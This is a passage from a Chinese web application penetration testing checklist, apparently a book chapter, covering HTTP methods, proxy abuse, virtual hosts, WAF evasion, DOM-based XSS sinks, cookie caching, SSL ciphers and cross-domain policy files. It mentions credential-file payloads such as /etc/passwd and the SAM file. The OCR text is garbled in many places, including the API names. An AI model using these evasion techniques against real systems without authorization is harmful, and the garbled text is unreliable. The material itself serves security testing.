认 内 容 与 功能 。 如 有 可 能 ,在 本 地 安装 这 些 技 术 ， 并 在 其 中 查找 可 在 渗透 测试 中 利用 的 所 有 默认 
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(3) 检查 先 认 内 容 ， 从 中 碍 找 任何 可 用 于 攻击 服务 从 或 应 用 程序 的 功能 或 漏洞 。 
21.11.3 ”测试 危险 的 HTTP 方 法 


() 使 用 oPTIONS 方 法 列 出 服务 做 使 用 的 HITTP 方 法 。 请 注意 ,不同 目 录 中 激活 的 方法 可 能 
不 相同 。 可 以 使 用 Paros 进 行 漏洞 扫描 ， 帮 助 完 成 这 个 检查 。 

(2) 手动 测试 每 一 种 方法 ,确认 其 是 否 可 用 。 

(3) 如 有 果 发 现 一 些 WebDAV 方 法 被 激活 ， 使 用 一 个 激活 WebDAV 的 客户 问 进 行 深 入 调查 ， 如 
Microsoft FrontPage 或 Internet Explorer 中 的 Open as Web Folder( 以 Web 文 件 夹 打 开 ) 选项 。 











21.11.4 测试 代理 功能 


(1) 使 用 cET 与 CONNECT 请 求 ， 笠 试 使 用 Web 服 务 禹 作为 代理 服务 硕 ， 连 接 因 特 网 上 的 其 他 服 
务 益 ， 并 获取 其 中 的 内 容 。 

(2) 尝试 使 用 前 面 描述 的 两 种 技巧 连接 主机 基础 架构 中 的 不 同 IP 地 址 与 端口 。 

(3) 尝试 使 用 前 面 描述 的 两 种 技巧 , 在 请 求 中 指定 127.0.0.1 为 目标 主机 , 连接 Web 服 务 硕 上 的 


常用 端口 号 。 











21.11.5 测试 虚拟 主机 配置 不 当 


(1) 使 用 以 下 方式 向 根 目录 提交 GET 请 求 : 
口 正确 的 Host 消 息 头 ; 
口 恶意 Host 消 息 头 ; 
D Host 消息 头 中 的 服务 咒 卫 地址 ; 
口 无 Host 消 息 头 〈 仅 使 用 HTTP/1.0 )。 
(2) 比较 对 这 些 请 求 的 响应 。 常 见 的 结果 是 ， 在 Host 消 息 头 中 使 用 服务 器 的 卫 地 址 获得 目录 
列表 。 还 可 以 获得 各 种 默认 内 容 。 
(3) 如 果 观 测 到 应 用 程序 表现 出 不 同 的 行为 ,使 用 生成 不 同 结果 的 主机 名 称 重 复 21.1 方 描述 的 
应 用 程序 解析 过 程 。 一 定 要 使 用 -vhost 选项 进行 一 次 Nikto 扫 描 ， 确 定 在 最 初 的 应 用 程序 解析 过 
程 中 忽略 的 默认 内 容 。 























21.11.6 ”测试 Web 服 务 器 软件 漏洞 


(1) 使 用 Nessus 与 所 拥有 的 所 有 其 他 类 似 的 扫描 带 ， 确 定 所 测试 的 Web 服 务 器 软件 中 存在 的 
所 有 已 知 漏洞 。 

(2) 同时 ， 浏 览 Security Focus 、Bugtraq 和 Full Disclosure 等 资源 ， 在 攻击 目标 中 查找 最 近 发 现 
的 、 尚 未 修复 的 漏洞 信息 。 
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(3) 如 果 应 用 程序 由 第 三 方 开 发 ， 确 定 它 是 否 自 带 Web 服 务 需 (通常 为 一 个 开源 服务 器 ); 如 
果 是 ,在 这 个 服务 器 中 查找 所 有 漏洞 。 请 注意 ,在 这 种 情况 下 ， 服 务 器 的 标准 版 本 信息 可 能 已 被 
修改 。 

(4) 如 有 可 能 ， 应 该 考虑 在 本 地 安装 所 测试 的 软件 ， 并 自己 进行 测试 ， 查 找 尚 未 发 现 或 广泛 
流传 的 新 漏洞 。 

















21.11.7 ”测试 Web 应 用 程序 防火 墙 


(1) 在 参数 值 中 使 用 明确 的 攻击 有 效 载 向 回应 用 程序 ( 最 好 是 啊 应 中 包含 名 称 和 /或 值 的 某 个 
应 用 程序 位 置 ) 提交 任意 参数 名 称 。 如 果 应 用 程序 阻止 该 攻击 ， 这 可 能 是 由 于 外 部 防御 机 制 所 
致 。 

(2) 如 采 可 以 提交 在 服务 硕 啊 应 中 返回 的 变量 ， 则 提供 一 系列 模糊 测试 字符 串 及 这 些 字 人 符 串 
的 编码 形式 可 以 确定 应 用 程序 的 用 户 输入 防御 行为 。 

(3) 对 应 用 程序 中 的 变量 实施 相同 的 攻击 来 确认 这 一 行为 。 

(4) 对 于 所 有 模糊 测试 字符 串 和 请 求 ， 使 用 标准 签名 数据 库 中 不 可 能 存在 的 有 效 载 向 字符 
串 .根据 定义 ,我 们 不 可 能 提供 这 些 字 符 串 的 示例 。 但 是 ,在 进行 文件 检索 时 , 应 避免 将 /etc/passwd 
或 /windows/system32/config/sam 作 为 有 效 载 何 。 此 外 ， 应 在 XSS 攻 击 中 避免 使 用 <script>, 并 避 
人 锡 将 alert () 或 xss 用 作 XSS 有 效 载 荷 。 

(5) 如 果 特 定 请 求 被 阻止 ， 可 以 尝试 在 其 他 位 置 或 上 下 文中 提交 相同 的 参数 。 例 如 ， 在 GET 
请 求 的 URL 中 、 在 PosT 请 求 主体 中 ， 以 及 在 PosT 请 求 的 URL 中 提交 相同 的 参数 。 

(6) 此 外 ,应 尝试 在 ASP.NET 上 将 参数 作为 cookie 提 交 。 如 果 在 查询 字符 串 或 消息 主体 中 找 不 
到 参数 foo，API Request.Params["foo"] 会 检索 名 为 £00 的 cookie 的 值 。 

(7) 回顾 第 4 章 中 介绍 的 引入 用 户 输入 的 所 有 其 他 方法 ， 选 择 其 中 任何 不 受 保护 的 方法 。 

(8) 确定 以 非 标 准 格 式 ( 如 序列 化 或 编码 ) 或 可 能 以 此 类 格式 提交 用 户 输入 的 位 置 。 如 果 找 
不 到 此 类 位 置 ， 可 以 通过 串联 字符 串 和 /或 将 字符 串 分 布 到 多 个 参数 中 来 构建 攻击 字符 串 。( 注 
意 ， 如 果 目 标 是 ASP.NET， 可 以 使 用 HPP 通 过 同一 变量 的 各 种 变 体 来 串联 攻击 字符 串 。) 


21.12 ”其 他 检查 



























































21.12.1 测试 基于 DOM 的 攻击 


21.12.2 测试 本 地 隐私 漏洞 


21.12.3 测试 脆弱 的 SSL 加 密 算 法 





21.12.4 检测 同 源 策 略 配 置 


图 21-13 ”其 他 检查 
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21.12.1 测试 基于 DOM 的 攻击 


(D 对 应 用 程序 中 包含 的 每 一 段 JavaScript 脚 本 进行 简单 的 代码 审查 ， 确 定 可 通过 任何 一 个 专 
门 设计 的 URL 、 在 相关 页 面 的 DOM 中 引入 恶意 数据 而 触发 的 XSS 或 重 定向 漏洞 。 审 查 内 容 包括 
HTML 页 面 ( 无 论 静 态 或 动态 生成 的 页 面 ) 中 的 所 有 单独 的 JavaScript 文 件 和 脚本 。 

CO) 确定 使 用 以 下 API 的 所 有 情况 ， 使 用 这 些 API 可 访问 通过 一 个 专门 设计 的 URL 控 制 的 
DOM 数 据 : 

document .location 


document .URL 
document .URLUnencoded 

















document .referrer 


window. location 
(3) 在 代码 中 追踪 相关 数据 ， 确 定 应 用 程序 对 它 执 行 何 种 操作 。 如 采 数 据 (或 它 的 一 个 被 操 
纵 的 表单 ) 被 提交 给 下 列 API 中 的 一 个 ， 那 么 应 用 程序 可 能 易于 受到 XSS 攻 击 : 


document .writel) 





document .writelntl) 
document .body.innerHtml 
evalt{) 
Window. execScript{() 
window.setIinterval () 

) 


window.setTimeout ( 
(4) 如 有 果 数 据 被 提交 给 下 列 API 中 的 一 个 ， 那 么 应 用 程序 可 能 易于 受到 重 定 问 攻击 : 


document,. location 





document. URL 





document .open{() 
window. location.href 
Window.navigate!) 


Window. open{() 


21.12.2 测试 本 地 隐私 漏洞 


(1) 检查 拦截 代理 服务 硕 生 成 的 日 志 ， 确 定 测 试 过 程 中 应 用 程序 送出 的 所 有 Set-cookie 指 
令 。 如 采 发 现 有 任何 Set-cookie 指 令 包 含 一 个 将 来 日 期 的 expires 属 性 ， 用 户 的 浏览 硕 会 将 该 
cookie 保 持 到 这 个 日 期 。 检 查 传送 敏感 数据 的 持久 性 cookie 的 所 有 内 容 。 

(2) 如 果 一 个 持久 性 cookie 中 包含 敏感 数据 ， 那 么 本 地 攻击 者 就 能 够 截获 这 些 数据 。 即 使 这 
些 数据 被 加 密 ， 和 截获 它们 的 攻击 者 仍然 可 以 将 这 个 cookie 重 新 提交 给 应 用 程序 ， 访 问 该 cookie 访 
问 的 任何 数据 或 功能 。 

(3) 如 采 包 含 敏感 数据 的 页 面 通 过 HTTP 访 问 ， 在 服务 着 啊 应 中 寻找 缓存 指令 。 如 条 其 中 没 
有 下 列 指 令 〈 在 HITP 消 息 头 或 HTML 元 标签 中 )， 那 么 相关 页 面 可 能 被 一 个 或 几 个 浏览 硕 存 人 绥 
人 存 : 
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ExpPires: 0 
Cache-control: no-cache 


Pragma: no-cache 

(4) 确定 应 用 程序 中 通过 URL 参 数 传送 敏感 数据 的 所 有 情况 。 如 采 存 在 这 样 的 情况 ， 检 查 浏 
览 硕 的 历史 记录 ,证 实 这 些 数据 已 经 保存 在 那里 。 

(5) 对 于 用 户 提交 敏感 数据 ( 如 信用 卡 信息 ) 的 所 有 表单 ， 审 查 其 中 的 HTML 源 代码 。 如 果 
没有 在 表单 标签 或 输入 字段 的 标签 中 设置 autocomplete=off 必 性 ,输入 的 数据 将 保存 在 激活 目 
动 完 成 的 浏览 希 中 。 


























21.12.3 ”测试 脆弱 的 SSL 加 密 算法 


(1) 如 果 应 用 程序 使 用 SSL 进 行 通信 ， 使 用 THCSSLCheck 工 具 列 出 它 支 持 的 加 密 算法 和 协议 。 

(2) 如 果 SSL 支 持 脆 弱 或 过 时 的 加 密 算 法 和 协议 , 处 在 适当 位 置 的 攻击 者 就 可 以 实施 攻击 , 降 
级 或 破译 应 用 程序 用 户 的 SSL 通 信 ， 访 问 他 们 的 敏感 数据 。 

(3) 一 些 Web 服 务 需 声 称 它 文 持 某 些 脆弱 加 密 算 法 和 协议 ,但 如 果 客 户 提出 请 求 ， 它 实际 上 拒 
绝 使 用 这 些 算法 和 协议 完成 握手 。 在 使 用 THCSSLCheck 工 具 时 ， 这 种 情况 可 能 会 造成 错误 警报 。 
可 以 使 用 Opera 浏 览 器 ， 尝 试 通过 指定 的 脆弱 协议 完成 一 次 握手 ， 确 定 是 否 可 使 用 这 些 协议 访问 
应 用 程序 。 
































21.12.4 检查 同 源 策 略 配置 


(1) 检查 /crossdomain.xml 文 件 。 如 采 应 用 程序 允许 无 限制 访问 〈 通 过 指定 <allow-access- 
from domain="*" /> ) ,来 日 其 他 站 点 的 Flash 对 和 象 可 以 “对 置 ” 应 用 程序 用 户 的 会 话 ， 以 进 
行 双 同 交 互 。 这 导致 任何 其 他 域 可 以 检索 所 有 数据 ， 并 执行 任何 用 户 操 作 。 

(2) 检查/clientaccesspolicy.xml 文 件 。 与 Flash 类 似 ， 如 果 <cross-domain-access> 配 置 过 于 
宽泛 ， 其 他 站 点 将 可 以 与 接受 测试 的 站 点 进行 双 回 交互 。 

(3) 通过 添加 指定 其 他 域 的 origin 消 息 头 并 检查 返回 的 任何 Access-control 消 息 头 ,使 用 
XMLHt tpRequest 测 试 应 用 程序 如 何 处 理 跨 域 请 求 。 允许 任 何 域 、 或 指定 的 其 他 域 进 行 双 问 交互 
的 安全 隐患 与 Flash 叶 域 策略 造成 的 安全 隐患 相同 。 


21.13 ”检查 信息 泄露 


() 在 探查 目标 应 用 程序 的 整个 过 程 中 ， 监 控 它 的 啊 应 ， 查 找 可 能 包含 与 错误 原因 、 所 使 用 
拉 术 以 及 应 用 程序 的 内 部 结构 与 功能 有 天 的 错误 消 居 。 

(2) 如 条 收 到 不 背风 的 错误 消息 ， 使 用 标准 的 搜索 引擎 检查 这 些 消 息 。 可 以 使 用 各 种 高 级 搜 
索 特性 缩小 搜索 范围 。 例 如 : 


"unable to retrieve" filetype:php 


(3) 检查 搜索 结 来 ， 寻 找 关 于 错误 消息 的 所 有 讨论 以 及 其 他 出 现 相 同 消息 的 所 有 站 点 。 其 他 















































626 第 21 章 Web 应 用 程序 渗透 测试 方法 论 


应 用 程序 生成 的 同一 条 错误 消息 可 能 更 详细 ， 有 助 于 渗透 测试 员 更 好 地 了 解 错 误 条 件 。 使 用 搜索 
引擎 绥 存 获取 不 再 出 现在 当前 应 用 程序 中 的 错误 消息 。 

(4) 使 用 Google 代 码 搜索 查找 生成 特定 错误 消息 的 、 公 开发 布 的 所 有 代码 。 搜 索 可 能 被 便 编 
码 到 应 用 程序 源 代 人 码 中 的 错误 消息 代码 段 。 还 可 以 使 用 各 种 高 级 搜索 特性 指定 代码 语言 及 其 他 已 
知 的 细 万 。 例 如 : 

unable\ to retrieve lang:php Package:mail 

(5) 如 有 果 获 得 包含 库 与 第 三 方 代码 组 件 名 称 的 栈 追 踪 错 误 消 县 ,在 上 述 两 种 搜索 引 苟 中 搜索 
这 些 名 称 。 
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